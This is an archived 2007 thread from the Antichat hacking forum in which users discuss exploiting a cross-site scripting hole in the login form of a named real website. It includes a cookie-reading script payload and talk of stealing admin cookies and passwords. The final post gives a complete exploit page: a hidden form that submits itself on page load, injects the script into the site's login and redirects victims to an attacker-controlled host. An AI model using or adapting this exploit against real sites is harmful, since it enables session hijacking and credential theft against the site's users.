Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Forum for discussion of ANTICHAT (https://forum.antichat.xyz/forumdisplay.php?f=72)
-   -   another question for xss (https://forum.antichat.xyz/showthread.php?t=53373)

Fugitif 11.11.2007 20:06

another question for xss
 
well

if u try to put some string like this
Код:

"><script>alert(document.cookie)</script>
on nick+login in that site



http://www.proplay.ru/

http://funkyimg.com/u/677402JPG.jpg


result:


http://funkyimg.com/u/712561JPG.jpg




Another site:

http://funkyimg.com/u/914555JPG.jpg


http://funkyimg.com/u/633204JPG.jpg


my question:


You think that can be exploitable?

NOmeR1 11.11.2007 20:55

Just if request method is get, because method post is invisible.

Fugitif 11.11.2007 21:14

I have found many site vulnerable to xss on admin (user) login,and I think that using some cookie sniffer can be done something.


thx for your answer Mr.NOmeR1 (you are right) ;)

~EviL~ 16.11.2007 14:57

Even if the request method is post, you can write a PHP script to post the data, and it will be still exploitable. If I am wrong, correct me =)

inv 16.11.2007 15:02

you can use post (it will be better)
you can get admin's passwd ( use javascript)
sorry for my english

Macro 16.11.2007 19:54

Цитата:

Сообщение от ~EviL~
Even if the request method is post, you can write a PHP script to post the data, and it will be still exploitable. If I am wrong, correct me =)

You're right, but there isn't a neccessity to write php script, you can use just javascript and html ;)

LeverOne 16.11.2007 21:31

http://www.proplay.ru/

- method GET not supported
- no referer-control


http://yourhost.xz/g.html - link with XSS-exploit

file g.html

Код:


<body onload='document.forms[0].submit()'>
<form method="post" action="http://www.proplay.ru/users/login/">
<input name="name" value='"><script>alert(document.cookie);document.location.href=\"http://yourhost.xz/q.html\";</script>' style="visibility:hidden;display:none">
</form>

redirect -->> q.html with any content

Another site -->> by analogy


Время: 21:47